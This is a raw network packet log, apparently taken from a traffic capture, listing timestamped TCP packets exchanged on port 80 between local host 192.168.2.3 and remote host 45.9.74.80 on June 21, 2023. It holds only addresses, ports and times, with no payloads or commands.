Jun 21, 2023 04:27:58.326713085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326742887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326788902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326793909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326833963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326834917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326880932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326930046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326939106 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326982021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327033997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327095032 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.327101946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327161074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327208996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327214003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.327255964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327259064 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.327301979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327347994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327348948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.327394009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327440023 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.327440023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327491045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327541113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327586889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327593088 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.327632904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327677965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327683926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.327724934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327759027 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.327770948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327817917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327851057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.327862978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327894926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327927113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.327958107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328002930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328047991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328052998 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328073025 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328080893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328126907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328171968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328211069 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328217983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328236103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328294992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328341007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328373909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328388929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328435898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328480959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328491926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328531027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328573942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328577042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328624010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328669071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328696012 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328716040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328733921 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328761101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328807116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328851938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328857899 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328897953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328943968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.328952074 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.328989029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329018116 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329037905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329082966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329128027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329135895 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329174042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329185009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329221010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329267025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329277039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329313993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329358101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329369068 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329405069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329451084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329468012 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329495907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329545021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329547882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329591036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329638004 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329648972 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329687119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329730988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329747915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329777956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329823971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329855919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329870939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329916000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.329952955 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.329962015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330009937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330054998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330100060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330153942 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330218077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330265045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330286980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.330286980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.330312014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330343008 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.330358028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330404997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330435038 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.330451012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330496073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330544949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.330574036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.330595016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.357707024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.357815981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.357881069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.357939959 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.357944965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.357992887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358017921 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358040094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358087063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358133078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358156919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358180046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358227015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358257055 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358275890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358287096 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358325005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358371973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358388901 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358417034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358463049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358473063 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358509064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358558893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358604908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358612061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358655930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358701944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358707905 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358750105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358793974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358800888 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358839989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358851910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358886003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358930111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.358937979 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.358975887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359021902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359035015 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359069109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359116077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359159946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359174013 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359206915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359273911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359287024 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359319925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359338999 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359366894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359412909 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359458923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359472036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359507084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359525919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359561920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359606981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359652996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359673023 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359698057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359708071 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359745979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359791040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359816074 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359838009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359885931 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359930038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359944105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.359977007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.359988928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360023975 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360068083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360111952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360130072 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360158920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360176086 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360207081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360251904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360327005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360352993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360373020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360383987 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360419035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360464096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360507965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360539913 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360557079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360568047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360604048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360650063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360697031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360721111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360743046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360773087 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360790014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360836029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360879898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360905886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.360925913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.360949039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361007929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361059904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361105919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361129045 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361150026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361197948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361219883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361243963 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361265898 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361289978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361335039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361356020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361378908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361424923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361434937 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361471891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361515999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361563921 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361569881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361608982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361653090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361665964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361697912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361701012 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361742973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361788034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361813068 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361834049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361879110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361922979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.361939907 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.361968994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.362013102 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.362026930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.362057924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.362065077 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.362103939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.362149000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.362157106 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.362195015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.362238884 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.362250090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.362284899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.365096092 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.389245987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389309883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389355898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389401913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389447927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389535904 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.389547110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389599085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389677048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.389694929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389779091 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.389808893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389858007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389900923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389945984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.389988899 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.390044928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.390058994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390105009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390183926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.390211105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390259027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390305042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390374899 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.390386105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390454054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.390466928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390511036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390559912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390629053 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.390645027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390691996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390767097 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.390784979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390866995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.390904903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390952110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.390996933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391067982 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.391082048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391149998 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.391168118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391215086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391261101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391319036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391345978 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.391365051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391371965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.391412020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391455889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391474009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.391500950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391549110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391556978 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.391594887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391639948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391645908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.391685963 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391731024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391777992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391799927 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.391823053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391840935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.391879082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391942024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.391946077 CEST	49719	80	192.168.2.3	45.9.74.80
